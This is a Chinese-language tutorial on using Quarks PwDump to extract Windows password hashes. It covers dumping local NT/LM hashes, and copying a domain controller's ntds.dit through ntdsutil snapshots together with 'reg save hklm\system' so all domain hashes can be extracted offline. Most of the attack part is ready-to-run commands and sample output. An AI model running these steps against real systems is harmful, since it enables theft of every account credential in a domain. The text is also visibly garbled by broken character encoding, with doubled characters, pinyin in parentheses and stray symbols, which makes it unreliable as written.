Quarks PwDump是quarkslab出品的一款用戶密碼提取開源工具，目前軟件***版本為0.2b，其完整源代碼可以從https://github.com/quarkslab/quarkspwdump獲取，目前它支持Windows XP/2003/Vista/7/2008版本，且相當(dāng)穩(wěn)定?？梢宰トindows平臺(tái)下多種類型的用戶憑據(jù)，包括：本地帳戶、域帳戶、緩存的域帳戶和Bitlocker。作者開發(fā)這個(gè)工具的原因是現(xiàn)在沒有一款工具能同時(shí)抓取所有類型的hash和Bitlocker信息。

工具源代碼下載地址：https://codeload.github.com/quarkslab/quarkspwdump/zip/master。

它目前可以導(dǎo)出 :

– Local accounts NT/LM hashes + history 本機(jī)NT/LM哈希+歷史登錄記錄
– Domain accounts NT/LM hashes + history 域中的NT/LM哈希+歷史登錄記錄
– Cached domain password 緩存中的域管理密碼
– Bitlocker recovery information (recovery passwords & key packages) 使用Bitlocker的恢復(fù)后遺留的信息。

1.使用Quarks PwDump本地帳號(hào)的哈希值

Quarks PwDump必須在Dos命令提示符下運(yùn)行，直接運(yùn)行QuarksPwDumpv0.2b.exe，如圖1所示，默認(rèn)顯示幫助信息，其參數(shù)含義如下：

-dhl 導(dǎo)出本地哈希值
-dhdc導(dǎo)出內(nèi)存中的域控哈希值
-dhd 導(dǎo)出域控哈希值，必須指定NTDS文件
-db 導(dǎo)出Bitlocker信息，必須指定NTDS文件
-nt 導(dǎo)出ntds文件
-hist 導(dǎo)出歷史信息，可選項(xiàng)
-t 導(dǎo)出類型可選默認(rèn)導(dǎo)出為John類型。
-o 導(dǎo)出文件到本地

圖1使用Quarks PwDump本地帳號(hào)的哈希值

2.使用Quarks PwDump導(dǎo)出賬號(hào)實(shí)例

使用命令“QuarksPwDumpv0.2b.exe -dhl -o 1.txt”將導(dǎo)出本地哈希值到當(dāng)前目錄的1.txt，執(zhí)行命令會(huì)顯示導(dǎo)出帳號(hào)的數(shù)量，如圖2所示。顯示有3個(gè)帳號(hào)導(dǎo)出到1.txt，打開1.txt可以看到導(dǎo)出哈希值的具體帳號(hào)和值。

圖2導(dǎo)出本地帳號(hào)到文件

3.配合ntdsutil工具導(dǎo)出域控密碼

Ntdsutil.exe是一個(gè)為 Active Directory 提供管理設(shè)施的命令行工具?？墒褂肗tdsutil.exe 執(zhí)行Active Directory的數(shù)據(jù)庫(kù)維護(hù)，管理和控制單個(gè)主機(jī)操作，創(chuàng)建應(yīng)用程序目錄分區(qū)，以及刪除由未使用Active Directory安裝向?qū)?(DCPromo.exe)成功降級(jí)的域控制器留下的元數(shù)據(jù)。Ntdsutil還可以用來獲取域控?cái)?shù)據(jù)庫(kù)ntds.dit文件，具體命令如下：

(1)創(chuàng)建快照

ntdsutil snapshot "activate instance ntds" create quit quit

(2)Ntdsutil掛載活動(dòng)目錄的快照

ntdsutil snapshot "mount {GUID}" quit quit

{GUID}為動(dòng)態(tài)獲取的，如圖3所示。

(3)復(fù)制快照的本地磁盤

copy MOUNT_POINT\windows\NTDS\ntds.dit c:\ntds.dit

(4)卸載快照

ntdsutil snapshot "unmount {GUID}" quit quit

(5)刪除快照

ntdsutil snapshot "delete {GUID}" quit quit

圖3導(dǎo)出快照文件

使用命令“QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit”將導(dǎo)出的ntds.dit文件中哈希值全面導(dǎo)出。一個(gè)完整的實(shí)例如下：

tdsutil snapshot "activate instance ntds" create quit quit
ntdsutil snapshot "mount {a0455f6c-40c3-4b56-80a0-80261471522c}" quit quit
快照 {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827} 已掛接為 C:\$SNAP_201212082315_VOLUM
EC$\
copy C:\$SNAP_201212082315_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
ntdsutil snapshot "unmount {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit quit
ntdsutil snapshot "delete {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit quit
QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit

說明：獲取哈希值***都在同一臺(tái)服務(wù)器上執(zhí)行，也即將QuarksPwDump.exe直接放在導(dǎo)出ntds.dit服務(wù)器上，執(zhí)行導(dǎo)出命令。如果僅僅將ntds.dit復(fù)制后下載本地可能會(huì)出現(xiàn)無法讀取錯(cuò)誤。網(wǎng)上也曾經(jīng)出現(xiàn)一個(gè)NTDS.dit密碼快速提取工具ntdsdump，讀者可以自己進(jìn)行測(cè)試。如果是想下載ntds.dit到本地恢復(fù)還需要執(zhí)行“reg save hklm\system system.hive”，將system.hive和ntds.dit全部復(fù)制到本地進(jìn)行域控密碼獲取。

參考資料

1. Quarks PwDump，http://blog.quarkslab.com/quarks-pwdump.html

2. NTDS.dit密碼快速提取工具，http://www.secpulse.com/archives/6301.html